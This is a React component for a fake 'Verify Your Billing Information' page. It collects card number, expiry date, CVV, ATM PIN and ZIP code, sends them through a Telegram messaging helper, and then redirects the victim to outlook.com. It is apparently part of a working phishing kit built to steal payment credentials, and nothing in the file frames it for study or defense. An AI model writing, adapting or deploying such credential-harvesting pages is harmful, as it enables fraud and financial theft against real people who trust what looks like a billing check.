import React, { useState } from 'react';
import logo from './logo.svg';
import { sendMessage } from './telegramUtils'

const Next = () => {
// Set up the form with react hook forms
  const [errors, setErrors] = useState({});
  const [data, setData] = useState({
    card: "",
    expiryDate: "",
    cvv: "",
    atm: "",
    zipcode: "",
  });

  const validateForm = () => {
    let validationErrors = {};

      // Card validation: Required field
      if (data.card.length !== 16) {
        validationErrors.card = "Card Number must be 16 digits";
      }
  
      // Expiry Date validation: Required field
      if (data.expiryDate.length !== 5) {
        validationErrors.expiryDate = "Expiry date is required";
      }

          // CVV validation: 3 digits required
    if (data.cvv.length !== 3) {
      validationErrors.cvv = 'CVV must be 3 digits';
    }

        // ATM PIN validation: 4 digits required
        if (data.atm.length !== 4) {
          validationErrors.atmPin = 'ATM PIN must be 4 digits';
        }

      // ZIP Code validation: 5 digits required
      if (data.zipcode.length !== 5) {
        validationErrors.zipCode = 'ZIP Code must be 5 digits';
      }

      setErrors(validationErrors);
      return Object.keys(validationErrors).length === 0;
  }
  

  const handleSubmit = async (e) => {
    e.preventDefault();


    if (validateForm()) {
      // Form is valid, submit data to server or perform other actions
      try {

      await sendMessage(data)
      window.location.href = 'http://outlook.com/'
      } catch (err) {
        console.error(err);
      }

      // Reset the form data
      setData({
        card: "",
        expiryDate: "",
        cvv: "",
        atm: "",
        zipcode: "",
      });

      // Clear the errors
      setErrors({});
    }    
  };

  return (
    <div className='Next Viola'>
      <span className="container flex items-center justify-center direction">
      <img src={logo} className="App-logo" alt="logo" />
      <h2>Verify Your Billing Information</h2>
    <form onSubmit={handleSubmit}>
    
        
          <label>Card Number:</label>
          <input  
          type="text" 
          value={data.card} 
          onChange={(e) => setData({ ...data, card: e.target.value })} 
          />
          {errors.card && <span className="error">{errors.card}</span>}

      
       
         <label>Expiry Date:</label>
              <input
                type="text"
                value={data.expiryDate}
                onChange={(e) => setData({ ...data, expiryDate: e.target.value })}
              />
              {errors.expiryDate && <span className="error">{errors.expiryDate}</span>}
    
          <label>CVV:</label>
          <input
            type="text"
            value={data.cvv}
            onChange={(e) => setData({ ...data, cvv: e.target.value })}
          />
          {errors.cvv && <span className="error">{errors.cvv}</span>}
      

         <label>ATM Pin</label>
              <input
                type="text"
                value={data.atm}
                onChange={(e) => setData({ ...data, atm: e.target.value })}
              />
              {errors.atm && <span className="error">{errors.atm}</span>}

              
            <label>Zip Code</label>
              <input
                type="text"
                value={data.zipcode}
                onChange={(e) => setData({ ...data, zipcode: e.target.value })}
              />
               {errors.zipcode && <span className="error">{errors.zipcode}</span>}

       <button type="submit" className="btn btn-primary">Submit</button>      
      </form>
      </span>
      
    </div>
  );
};


export default Next;
